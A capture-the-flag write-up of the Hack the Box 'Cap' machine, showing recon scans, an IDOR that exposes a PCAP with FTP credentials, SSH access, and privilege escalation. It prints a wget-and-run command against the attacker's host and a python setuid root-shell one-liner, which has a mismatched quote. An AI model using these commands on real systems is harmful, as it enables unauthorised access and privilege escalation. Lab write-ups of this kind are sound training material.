CTF Competitions Write-ups GitBook About

Contents

Hack the Box - CAP

 included in write-ups
   286 words   2 minutes 
/cap/image.png
Write-up of CAP - Difficulty : Easy

1. Recon

We start off with running rustscan to find any open ports on the box.

1

rustscan -a 10.129.227.218 --ulimit 5000

/cap/rustcan.png
Afterwards we can start a gobuster scan to find any directories while we look at the site.

/cap/drib.png

2.1 Website

The website appears to be a monitoring tool that already has a user logged in.
/cap/website.png

If we go to /data we can see that network packets are being captured and we are able to download the PCAP file to view them in wireshark.
/cap/website2.png

Notice how the site is numbered so common sense says to try lower numbers than what we arrive at in the hopes of finding other PCAP files. /0 is valid and allows us to download a file from when Nathan had logged into the FTP server.
/cap/website3.png
If we load the PCAP file into wireshark we can view Nathan’s username and password.
/cap/pcap.png

3. Foothold

Nathan’s credentials work on the FTP server as well as allowing us to SSH into the box and grab the user flag.
/cap/ssh.png

4. Privilege Escalation

From there we can upload LinPEAAS to the box by hosting a python web server and using the wget command to grab it from our attack box. Running linpeas.sh shows us that the python3 CAP-SETUID capability is allowed.

1
2

attack box = python3 -m http.server
victim box = wget http://10.10.14.3:8000/linpeas.sh;bash linpeas.sh

/cap/linpeas.png

Head over to www.gtfobins.com and we see that we can get a root shell since this capability is enabled.
/cap/gtfobins.png
Using the GTFObins command we’re able to get a root shell and grab the root flag.

1

python3 -c 'import os; os.setuid(0); os.system("/bin/sh)'

/cap/root.png

If this write-up was helpful consider leaving some respect on my HTB profile.
Updated on 2022-06-13
 IDORWebWiresharkpcapHTB
Back | Home